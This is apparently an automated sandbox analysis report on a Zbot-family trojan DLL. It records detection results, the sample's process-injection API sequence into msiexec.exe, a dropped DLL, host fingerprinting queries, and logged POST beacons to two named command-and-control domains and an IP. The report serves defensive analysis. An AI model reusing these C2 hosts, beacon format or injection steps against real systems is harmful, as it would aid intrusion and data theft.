Source: http://wingtonwelbemdon.com/web/post.php | Avira URL Cloud: Label: malware |
Source: http://wingtonwelbemdon.com/web/post.php | Virustotal: Detection: 6% | Perma Link |
Source: cXQT5g.dll | Virustotal: Detection: 10% | Perma Link |
Source: C:\Users\user\AppData\Roaming\Omne\fapud.dll | Joe Sandbox ML: detected |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 18_2_0014DF70 FindFirstFileW,FindNextFileW, | 18_2_0014DF70 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then mov eax, esi | 1_2_6E499AE0 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then movzx eax, byte ptr [ecx+ebx] | 1_2_6E4A7F10 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then movzx eax, byte ptr [esi+edi] | 1_2_6E4A5F30 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then movsx edi, byte ptr [ebx+eax] | 1_2_6E4A8FA0 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then test di, di | 1_2_6E4A6C60 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then mov ecx, dword ptr [6E4B2090h+eax*4] | 1_2_6E4A4C00 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then mov dword ptr [ebp-10h], esi | 1_2_6E4A70F0 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then lea esi, dword ptr [ebp-34h] | 1_2_6E4A1D00 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then movzx edx, word ptr [ecx] | 1_2_6E4A9530 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then mov eax, dword ptr [ebp+08h] | 1_2_6E4AB1B0 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then mov eax, esi | 18_2_00149AE0 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then mov ecx, dword ptr [00162090h+eax*4] | 18_2_00154C00 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then test di, di | 18_2_00156C60 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then mov dword ptr [ebp-10h], esi | 18_2_001570F0 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then lea esi, dword ptr [ebp-34h] | 18_2_00151D00 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then movzx edx, word ptr [ecx] | 18_2_00159530 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then mov eax, dword ptr [ebp+08h] | 18_2_0015B1B0 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then movzx eax, byte ptr [ecx+ebx] | 18_2_00157F10 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then movzx eax, byte ptr [esi+edi] | 18_2_00155F30 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then movsx edi, byte ptr [ebx+eax] | 18_2_00158FA0 |
Source: Traffic | Snort IDS: 2019141 ET TROJAN Zbot POST Request to C2 192.168.2.3:49739 -> 91.203.192.40:80 |
Source: Traffic | Snort IDS: 2019141 ET TROJAN Zbot POST Request to C2 192.168.2.3:49740 -> 91.203.192.40:80 |
Source: global traffic | HTTP traffic detected: POST /web/post.php HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: wingtonwelbemdon.comContent-Length: 429Connection: CloseCache-Control: no-cacheData Raw: 5b 12 67 2b ea 7c b2 13 b1 b0 c8 3f 99 f6 12 73 79 be 36 cb 57 94 54 3d 7d b5 00 58 9b 10 4a a6 25 7e 57 68 01 d2 8f 7e a9 0c ea 36 68 e3 9f 84 6f e8 93 fb cb fb 71 33 c5 48 b1 37 f8 cf 87 2a ff 13 55 1d ea 8d 7b fe 6d 8e 34 a8 aa 8e af bd 0c 50 be 56 dd 15 ba b3 19 7d 51 7d 7b 41 6d 82 c9 33 eb 25 62 20 bb 3f a6 6b 2b 2f 37 f2 0b 2c b4 f6 e1 3f 1d 38 8f df 6e 55 68 cc 5d 19 02 c3 ca 1f 98 de 8b c4 71 7c 24 bb 4d 48 c1 2c 0e b4 df 3c 21 39 22 ff da 3e 66 28 c7 dc 61 20 78 e3 dc c6 51 be 3a ab d7 39 97 d8 3f e7 85 7c b2 d1 a2 f9 05 2c 48 3c b3 e2 a7 10 c0 8b 26 47 c1 6f 61 cf 6b 70 30 94 56 7d 87 dc e0 18 df c2 61 09 17 33 ca 70 40 33 68 a4 a9 67 a6 f8 78 1b 51 9f df 8e 5f b4 07 e4 18 e4 47 26 ab 42 b1 14 95 bd ca 07 8e d6 c8 cc b0 1e 27 2b a6 d0 c9 73 7f 3a 94 60 22 43 ce 12 0e 96 64 d2 ed 55 63 6a 18 5e 16 9b 74 21 ef c8 2d 8d 62 69 d5 97 f3 f6 e2 19 ad 66 0f df 42 56 27 29 57 70 17 42 e2 31 3d d4 5d 4c 61 2d b4 a6 51 0e 35 a5 a6 97 ab c5 9a ea 45 b2 43 64 76 9e 2a 66 7e e5 17 a4 3a 11 9d d2 d2 02 5c 6a 6a 09 5c 56 22 f6 d9 29 a6 d6 b9 df 33 54 be 99 d0 91 cb 38 07 82 88 35 d9 2f 5f 79 dc 48 b3 9e 47 45 0a c4 a1 eb 8f 7d 13 6f de dd 37 c5 c7 fc 10 49 2b 4d c1 7f 21 6d 0d a3 f7 12 c3 de 61 38 32 35 b5 9a 85 d5 74 0d 09 a9 ba 6e a5 23 29 11 24 3b 96 60 f5 72 01 e9 be Data Ascii: [g+|?sy6WT=}XJ%~Wh~6hoq3H7*U{m4PV}Q}{Am3%b ?k+/7,?8nUh]q|$MH,<!9">f(a xQ:9?|,H<&Goakp0V}a3p@3hgxQ_G&B'+s:`"CdUcj^t!-bifBV')WpB1=]La-Q5ECdv*f~:\jj\V")3T85/_yHGE}o7I+M!ma825tn#)$;`r |
Source: global traffic | HTTP traffic detected: POST /web/post.php HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: donburitimesofindia.comContent-Length: 285Connection: CloseCache-Control: no-cacheData Raw: fa 09 a1 8f bf 84 28 1c b7 ee e8 94 0d 9a 89 22 72 8f 0b 43 df 1c dc b5 f5 3d 88 d0 13 98 c2 2e 8d 56 4c 02 ba dc 12 2e 22 c0 83 f6 a6 75 7a 4c a7 20 5b 33 03 33 b9 fb 0d 80 79 ff 30 07 4f e2 37 db 9d d5 22 45 b3 36 a5 46 fc 60 62 46 67 75 c4 98 76 9e 15 dd 72 7b d1 b5 99 b5 b3 89 a5 4a 01 fb 23 ed aa e8 73 f7 6e a3 e3 e7 ff 3a c3 e4 7c 3e 29 f7 d5 f0 47 17 a6 9d a0 04 95 d1 ca 0b 02 d7 50 16 43 0c b9 b4 ec 73 85 80 09 e4 c6 7c 17 f4 e9 f1 ea 37 12 f6 ae e0 0f 14 a9 e8 b0 2b 14 0e df 1f 63 6a 69 30 67 5b 70 29 e8 e4 85 b1 13 13 ef c6 a2 d6 59 08 4d fa 2a 61 cc ad 2b 85 8b 25 81 94 fb 01 11 98 22 ed d2 17 52 d7 16 39 f5 3f db bb 9a 48 8a 89 e0 50 a6 73 88 32 6a f5 af a5 35 93 52 2b 2f ae aa 7f 08 d8 1a f4 72 1f 9f f1 17 e4 df eb 6e dd 0b f0 bc 49 36 90 80 87 99 6b 34 0e 56 77 94 1e c2 ea 6c 24 4e 58 91 d2 46 d3 ee 1f b2 b3 b3 68 a3 14 14 b9 f7 Data Ascii: ("rC=.VL."uzL [33y0O7"E6F`bFguvr{J#sn:|>)GPCs|7+cji0g[p)YM*a+%"R9?HPs2j5R+/rnI6k4Vwl$NXFh |
Source: Joe Sandbox View | ASN Name: GARANT-PARK-INTERNETRU GARANT-PARK-INTERNETRU |
Source: global traffic | HTTP traffic detected: POST /web/post.php HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: wingtonwelbemdon.comContent-Length: 429Connection: CloseCache-Control: no-cacheData Raw: 5b 12 67 2b ea 7c b2 13 b1 b0 c8 3f 99 f6 12 73 79 be 36 cb 57 94 54 3d 7d b5 00 58 9b 10 4a a6 25 7e 57 68 01 d2 8f 7e a9 0c ea 36 68 e3 9f 84 6f e8 93 fb cb fb 71 33 c5 48 b1 37 f8 cf 87 2a ff 13 55 1d ea 8d 7b fe 6d 8e 34 a8 aa 8e af bd 0c 50 be 56 dd 15 ba b3 19 7d 51 7d 7b 41 6d 82 c9 33 eb 25 62 20 bb 3f a6 6b 2b 2f 37 f2 0b 2c b4 f6 e1 3f 1d 38 8f df 6e 55 68 cc 5d 19 02 c3 ca 1f 98 de 8b c4 71 7c 24 bb 4d 48 c1 2c 0e b4 df 3c 21 39 22 ff da 3e 66 28 c7 dc 61 20 78 e3 dc c6 51 be 3a ab d7 39 97 d8 3f e7 85 7c b2 d1 a2 f9 05 2c 48 3c b3 e2 a7 10 c0 8b 26 47 c1 6f 61 cf 6b 70 30 94 56 7d 87 dc e0 18 df c2 61 09 17 33 ca 70 40 33 68 a4 a9 67 a6 f8 78 1b 51 9f df 8e 5f b4 07 e4 18 e4 47 26 ab 42 b1 14 95 bd ca 07 8e d6 c8 cc b0 1e 27 2b a6 d0 c9 73 7f 3a 94 60 22 43 ce 12 0e 96 64 d2 ed 55 63 6a 18 5e 16 9b 74 21 ef c8 2d 8d 62 69 d5 97 f3 f6 e2 19 ad 66 0f df 42 56 27 29 57 70 17 42 e2 31 3d d4 5d 4c 61 2d b4 a6 51 0e 35 a5 a6 97 ab c5 9a ea 45 b2 43 64 76 9e 2a 66 7e e5 17 a4 3a 11 9d d2 d2 02 5c 6a 6a 09 5c 56 22 f6 d9 29 a6 d6 b9 df 33 54 be 99 d0 91 cb 38 07 82 88 35 d9 2f 5f 79 dc 48 b3 9e 47 45 0a c4 a1 eb 8f 7d 13 6f de dd 37 c5 c7 fc 10 49 2b 4d c1 7f 21 6d 0d a3 f7 12 c3 de 61 38 32 35 b5 9a 85 d5 74 0d 09 a9 ba 6e a5 23 29 11 24 3b 96 60 f5 72 01 e9 be Data Ascii: [g+|?sy6WT=}XJ%~Wh~6hoq3H7*U{m4PV}Q}{Am3%b ?k+/7,?8nUh]q|$MH,<!9">f(a xQ:9?|,H<&Goakp0V}a3p@3hgxQ_G&B'+s:`"CdUcj^t!-bifBV')WpB1=]La-Q5ECdv*f~:\jj\V")3T85/_yHGE}o7I+M!ma825tn#)$;`r |
Source: global traffic | HTTP traffic detected: POST /web/post.php HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: donburitimesofindia.comContent-Length: 285Connection: CloseCache-Control: no-cacheData Raw: fa 09 a1 8f bf 84 28 1c b7 ee e8 94 0d 9a 89 22 72 8f 0b 43 df 1c dc b5 f5 3d 88 d0 13 98 c2 2e 8d 56 4c 02 ba dc 12 2e 22 c0 83 f6 a6 75 7a 4c a7 20 5b 33 03 33 b9 fb 0d 80 79 ff 30 07 4f e2 37 db 9d d5 22 45 b3 36 a5 46 fc 60 62 46 67 75 c4 98 76 9e 15 dd 72 7b d1 b5 99 b5 b3 89 a5 4a 01 fb 23 ed aa e8 73 f7 6e a3 e3 e7 ff 3a c3 e4 7c 3e 29 f7 d5 f0 47 17 a6 9d a0 04 95 d1 ca 0b 02 d7 50 16 43 0c b9 b4 ec 73 85 80 09 e4 c6 7c 17 f4 e9 f1 ea 37 12 f6 ae e0 0f 14 a9 e8 b0 2b 14 0e df 1f 63 6a 69 30 67 5b 70 29 e8 e4 85 b1 13 13 ef c6 a2 d6 59 08 4d fa 2a 61 cc ad 2b 85 8b 25 81 94 fb 01 11 98 22 ed d2 17 52 d7 16 39 f5 3f db bb 9a 48 8a 89 e0 50 a6 73 88 32 6a f5 af a5 35 93 52 2b 2f ae aa 7f 08 d8 1a f4 72 1f 9f f1 17 e4 df eb 6e dd 0b f0 bc 49 36 90 80 87 99 6b 34 0e 56 77 94 1e c2 ea 6c 24 4e 58 91 d2 46 d3 ee 1f b2 b3 b3 68 a3 14 14 b9 f7 Data Ascii: ("rC=.VL."uzL [33y0O7"E6F`bFguvr{J#sn:|>)GPCs|7+cji0g[p)YM*a+%"R9?HPs2j5R+/rnI6k4Vwl$NXFh |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 18_2_00152C60 InternetReadFile, | 18_2_00152C60 |
Source: unknown | DNS traffic detected: queries for: wingtonwelbemdon.com |
Source: unknown | HTTP traffic detected: POST /web/post.php HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: wingtonwelbemdon.comContent-Length: 429Connection: CloseCache-Control: no-cacheData Raw: 5b 12 67 2b ea 7c b2 13 b1 b0 c8 3f 99 f6 12 73 79 be 36 cb 57 94 54 3d 7d b5 00 58 9b 10 4a a6 25 7e 57 68 01 d2 8f 7e a9 0c ea 36 68 e3 9f 84 6f e8 93 fb cb fb 71 33 c5 48 b1 37 f8 cf 87 2a ff 13 55 1d ea 8d 7b fe 6d 8e 34 a8 aa 8e af bd 0c 50 be 56 dd 15 ba b3 19 7d 51 7d 7b 41 6d 82 c9 33 eb 25 62 20 bb 3f a6 6b 2b 2f 37 f2 0b 2c b4 f6 e1 3f 1d 38 8f df 6e 55 68 cc 5d 19 02 c3 ca 1f 98 de 8b c4 71 7c 24 bb 4d 48 c1 2c 0e b4 df 3c 21 39 22 ff da 3e 66 28 c7 dc 61 20 78 e3 dc c6 51 be 3a ab d7 39 97 d8 3f e7 85 7c b2 d1 a2 f9 05 2c 48 3c b3 e2 a7 10 c0 8b 26 47 c1 6f 61 cf 6b 70 30 94 56 7d 87 dc e0 18 df c2 61 09 17 33 ca 70 40 33 68 a4 a9 67 a6 f8 78 1b 51 9f df 8e 5f b4 07 e4 18 e4 47 26 ab 42 b1 14 95 bd ca 07 8e d6 c8 cc b0 1e 27 2b a6 d0 c9 73 7f 3a 94 60 22 43 ce 12 0e 96 64 d2 ed 55 63 6a 18 5e 16 9b 74 21 ef c8 2d 8d 62 69 d5 97 f3 f6 e2 19 ad 66 0f df 42 56 27 29 57 70 17 42 e2 31 3d d4 5d 4c 61 2d b4 a6 51 0e 35 a5 a6 97 ab c5 9a ea 45 b2 43 64 76 9e 2a 66 7e e5 17 a4 3a 11 9d d2 d2 02 5c 6a 6a 09 5c 56 22 f6 d9 29 a6 d6 b9 df 33 54 be 99 d0 91 cb 38 07 82 88 35 d9 2f 5f 79 dc 48 b3 9e 47 45 0a c4 a1 eb 8f 7d 13 6f de dd 37 c5 c7 fc 10 49 2b 4d c1 7f 21 6d 0d a3 f7 12 c3 de 61 38 32 35 b5 9a 85 d5 74 0d 09 a9 ba 6e a5 23 29 11 24 3b 96 60 f5 72 01 e9 be Data Ascii: [g+|?sy6WT=}XJ%~Wh~6hoq3H7*U{m4PV}Q}{Am3%b ?k+/7,?8nUh]q|$MH,<!9">f(a xQ:9?|,H<&Goakp0V}a3p@3hgxQ_G&B'+s:`"CdUcj^t!-bifBV')WpB1=]La-Q5ECdv*f~:\jj\V")3T85/_yHGE}o7I+M!ma825tn#)$;`r |
Source: C:\Windows\System32\loaddll32.exe | Process Stats: CPU usage > 98% |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4AC9D0 | 1_2_6E4AC9D0 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 18_2_0015F410 | 18_2_0015F410 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 18_2_0015F4BC | 18_2_0015F4BC |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 18_2_0015C9D0 | 18_2_0015C9D0 |
Source: cXQT5g.dll | Binary or memory string: OriginalFilenameCaptain.dllD vs cXQT5g.dll |
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll | Jump to behavior |
Source: cXQT5g.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: fapud.dll.18.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: classification engine | Classification label: mal92.troj.evad.winDLL@3/2@3/1 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E49FDC0 LookupPrivilegeValueW,AdjustTokenPrivileges, | 1_2_6E49FDC0 |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 18_2_00143B10 AdjustTokenPrivileges,FindCloseChangeNotification, | 18_2_00143B10 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E498EB0 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW, | 1_2_6E498EB0 |
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Roaming\Omne | Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\{9AD2E113-FD6E-1193-7CD4-CAAB82FC3C29} |
Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\{BAAAD113-CD6E-31EB-7CD4-CAAB82FC3C29} |
Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\{0A43D38F-CFF2-8102-7CD4-CAAB82FC3C29} |
Source: C:\Windows\System32\loaddll32.exe | File created: C:\Users\user\AppData\Local\Temp\tmp.txt | Jump to behavior |
Source: cXQT5g.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers | Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: cXQT5g.dll | Virustotal: Detection: 10% |
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\cXQT5g.dll' | |
Source: unknown | Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe | |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe | Jump to behavior |
Source: cXQT5g.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT |
Source: cXQT5g.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE |
Source: cXQT5g.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC |
Source: cXQT5g.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: cXQT5g.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG |
Source: cXQT5g.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT |
Source: cXQT5g.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT |
Source: cXQT5g.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: | Binary string: d:\62\10\Six\Need\shoe\85\48\Name\23\43\Felt\Our\Captain.pdb source: loaddll32.exe, 00000001.00000002.459411505.000000006E51D000.00000002.00020000.sdmp, msiexec.exe, 00000012.00000003.464541289.0000000004400000.00000004.00000001.sdmp, cXQT5g.dll |
Source: cXQT5g.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata |
Source: cXQT5g.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc |
Source: cXQT5g.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc |
Source: cXQT5g.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata |
Source: cXQT5g.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata |
Source: initial sample | Static PE information: 0x6173D010 [Sat Oct 23 09:04:16 2021 UTC] |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4A70F0 LoadLibraryA,GetProcAddress, | 1_2_6E4A70F0 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B5E7D push ebx; iretd | 1_2_6E4B5E83 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B727C push ebx; retf | 1_2_6E4B72EB |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B7038 push dword ptr [ebp-773E11F7h]; ret | 1_2_6E4B705D |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B6EE2 pushfd ; retf | 1_2_6E4B6F4F |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B72A3 push ebx; retf | 1_2_6E4B72EB |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B7B4B push eax; iretd | 1_2_6E4B7B7F |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B6F44 pushfd ; retf | 1_2_6E4B6F4F |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B7B67 push eax; iretd | 1_2_6E4B7B7F |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4BA170 push esp; retf | 1_2_6E4BA186 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B75A4 push edi; iretd | 1_2_6E4B75A5 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E5359D5 push esi; ret | 1_2_6E5359DE |
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Roaming\Omne\fapud.dll | Jump to dropped file |
Source: C:\Windows\SysWOW64\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Omne\fapud.dll | Jump to dropped file |
Source: C:\Windows\SysWOW64\msiexec.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes | graph_18-14445 |
Source: C:\Windows\System32\loaddll32.exe TID: 6524 | Thread sleep count: 294 > 30 | Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 18_2_0014DF70 FindFirstFileW,FindNextFileW, | 18_2_0014DF70 |
Source: C:\Windows\System32\loaddll32.exe | Process information queried: ProcessInformation | Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4A70F0 LoadLibraryA,GetProcAddress, | 1_2_6E4A70F0 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E49F390 mov eax, dword ptr fs:[00000030h] | 1_2_6E49F390 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E533EB5 mov eax, dword ptr fs:[00000030h] | 1_2_6E533EB5 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E5339F3 push dword ptr fs:[00000030h] | 1_2_6E5339F3 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E533DEB mov eax, dword ptr fs:[00000030h] | 1_2_6E533DEB |
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 18_2_0014F390 mov eax, dword ptr fs:[00000030h] | 18_2_0014F390 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4AC590 GetProcessHeap,HeapAlloc,GetTempPathW,GetFileAttributesW,DeleteFileW,HeapFree, | 1_2_6E4AC590 |
Source: C:\Windows\System32\loaddll32.exe | Process token adjusted: Debug | Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E49B100 VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,GetThreadContext,VirtualProtectEx,SetThreadContext,VirtualProtectEx,ResumeThread,ExitProcess, | 1_2_6E49B100 |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe | Jump to behavior |
Source: msiexec.exe, 00000012.00000002.470677719.0000000002B30000.00000002.00000001.sdmp | Binary or memory string: Program Manager |
Source: msiexec.exe, 00000012.00000002.470677719.0000000002B30000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd |
Source: msiexec.exe, 00000012.00000002.470677719.0000000002B30000.00000002.00000001.sdmp | Binary or memory string: Progman |
Source: msiexec.exe, 00000012.00000002.470677719.0000000002B30000.00000002.00000001.sdmp | Binary or memory string: Progmanlock |
Source: C:\Windows\SysWOW64\msiexec.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId | Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid | Jump to behavior |
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.